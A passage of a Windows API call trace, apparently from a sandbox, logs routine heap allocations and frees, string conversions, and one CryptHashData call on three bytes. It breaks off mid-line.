[0188.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0188.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0188.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0188.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0188.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0188.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0188.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0188.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0188.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0188.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0188.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0188.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d78 [0188.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0188.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0188.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0188.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0188.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0188.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0188.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0188.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0188.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0188.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0188.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0188.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0188.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0188.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0188.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0188.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0188.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0188.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0188.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0188.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0188.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0188.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0188.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0188.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0188.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0188.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0188.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0188.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0188.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0188.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0188.608] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0188.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0188.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0188.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0188.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0188.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0188.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0188.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0188.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0188.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0188.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0188.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0188.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0188.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0188.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0188.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0188.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0188.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e48 [0188.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0188.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0188.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0188.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0188.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0188.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0188.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0188.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0188.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0188.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0188.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0188.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0188.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0188.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0188.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0188.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0188.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0188.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0188.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0188.609] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0188.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0188.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0188.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0188.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0188.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0188.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0188.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0188.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0188.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0188.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0188.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0188.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0188.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0188.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0188.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54dd8 [0188.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0188.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0188.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0188.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0188.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ee8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0188.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0188.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0188.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0188.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0188.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0188.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0188.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d18 [0188.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0188.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0188.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0188.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0188.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0188.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0188.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0188.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0188.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0188.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0188.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0188.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0188.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0188.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0188.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0188.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0188.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0188.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0188.617] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0188.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0188.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0188.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0188.617] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0188.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0188.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0188.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0188.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0188.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0188.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0188.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0188.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0188.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0188.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0188.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0188.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0188.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0188.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0188.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0188.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0188.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0188.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0188.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0188.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0188.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0188.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0188.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0188.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0188.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0188.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0188.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0188.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0188.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0188.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0188.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0188.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0188.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0188.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0188.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0188.619] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0188.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0188.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0188.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0188.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0188.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0188.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0188.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0188.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0188.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0188.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0188.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0188.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0188.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0188.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0188.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0188.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0188.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0188.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0188.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0188.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0188.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50a58, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0188.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0188.626] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0188.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0188.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0188.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0188.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0188.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0188.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0188.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0188.626] CryptHashData (hHash=0xa87550, pbData=0x2e54e48, dwDataLen=0x3, dwFlags=0x1) returned 1 [0188.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0188.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0188.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0188.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0188.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0188.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0188.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0188.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0188.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0188.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0188.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0188.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0188.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0188.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0188.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0188.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0188.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0188.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0188.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0188.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0188.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0188.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0188.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0188.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0188.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0188.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0188.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0188.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0188.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0188.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0188.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0188.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0188.896] HeapFree (in: hHeap=0x970000, 